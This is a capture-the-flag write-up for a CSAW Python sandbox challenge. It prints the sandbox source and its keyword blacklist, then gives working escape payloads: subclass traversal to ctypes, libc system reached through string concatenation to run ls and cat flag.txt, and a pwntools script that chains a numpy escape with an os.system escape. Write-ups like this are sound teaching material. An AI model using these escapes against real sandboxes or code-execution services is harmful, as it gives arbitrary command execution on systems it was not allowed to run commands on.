> Setting up a new coding environment for my data science
> students. Some of them are l33t h4ck3rs that got RCE and crashed my
> machine a few times :(. Can you help test this before I use it for
> my class? Two sandboxes should be better than one...
>
> nc pwn.chal.csaw.io 5011

This service hosts a Python REPL with a ridiculously low timeout.
I've initially done some blind probing using payloads from
<https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/>
and discovered that `().__class__.__bases__[0].__subclasses__()`
evaluates to all available classes.  It's possible to instantiate
objects from them and execute their methods, however calling anything
interesting like `read` raises an exception.  The source code shows
why:

   def main():
       print("EduPy 3.8.2")
       while True:
           try:
               command = input(">>> ")
               if any([x in command for x in blacklist.BLACKLIST]):
                   raise Exception("not allowed!!")

               final_cmd = """
   uOaoBPLLRN = open("sandbox.py", "r")
   uDwjTIgNRU = int(((54 * 8) / 16) * (1/3) - 8)
   ORppRjAVZL = uOaoBPLLRN.readlines()[uDwjTIgNRU].strip().split(" ")
   AAnBLJqtRv = ORppRjAVZL[uDwjTIgNRU]
   bAfGdqzzpg = ORppRjAVZL[-uDwjTIgNRU]
   uOaoBPLLRN.close()
   HrjYMvtxwA = getattr(__import__(AAnBLJqtRv), bAfGdqzzpg)
   RMbPOQHCzt = __builtins__.__dict__[HrjYMvtxwA(b'X19pbXBvcnRfXw==').decode('utf-8')](HrjYMvtxwA(b'bnVtcHk=').decode('utf-8'))\n""" + command
               exec(final_cmd)

           except (KeyboardInterrupt, EOFError):
               return 0
           except Exception as e:
               print(f"Exception: {e}")

It's a bad words filter.  There's a number of ways to bypass this, for
example with string concatenation.  To call a method dynamically,
`__getitem__('sy'+'stem')` can be used.  Unobfuscating the sandbox
code shows it's running in an environment with numpy loaded up.  This
explains why the ctypes class is available at the 246th position of
the class list.  It allows calling all kinds of C functions, including
`system`.  My final payload:

   $ nc pwn.chal.csaw.io 5011 <<< "print(blacklist.BLACKLIST)"
   EduPy 3.8.2
   >>> ['__builtins__', '__import__', 'eval', 'exec', 'import', 'from', 'os', 'sys', 'system', 'timeit', 'base64commands', 'subprocess', 'pty', 'platform', 'open', 'read', 'write', 'dir', 'type']
   >>> %
   $ nc pwn.chal.csaw.io 5011 <<< "print(().__class__.__bases__[0].__subclasses__()[245]('libc.so.6').__getitem__('sy'+'stem')(b'ls'))"
   EduPy 3.8.2
   >>> blacklist.py
   flag.txt
   runner.py
   sandbox.py
   solver.py
   0
   >>> %
   $ nc pwn.chal.csaw.io 5011 <<< "print(().__class__.__bases__[0].__subclasses__()[245]('libc.so.6').__getitem__('sy'+'stem')(b'cat flag.txt'))"
   EduPy 3.8.2
   >>> flag{y4_sl1th3r3d_0ut}
   0
   >>> %

Bonus: The file listing shown above includes an intended solution that
actually bypasses two separate sandboxes.  Behold:

   >>> #!/usr/bin/env python3
   from pwn import *

   def main():
       p = remote("localhost", "8000")
       numpy_escape = "RMbPOQHCzt.vdot(RMbPOQHCzt.intc(), RMbPOQHCzt.ndarray(1, {}))"
       py_escape = "[].__class__.__base__.__subclasses__()[134].__init__.__globals__['sys'].modules['os'].system('cat flag.txt')"

       p.sendlineafter(">>> ", numpy_escape)
       p.sendlineafter(">> ", py_escape)
       p.interactive()

   if __name__ == "__main__":
       main()

You are viewing proxied material from brause.cc. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.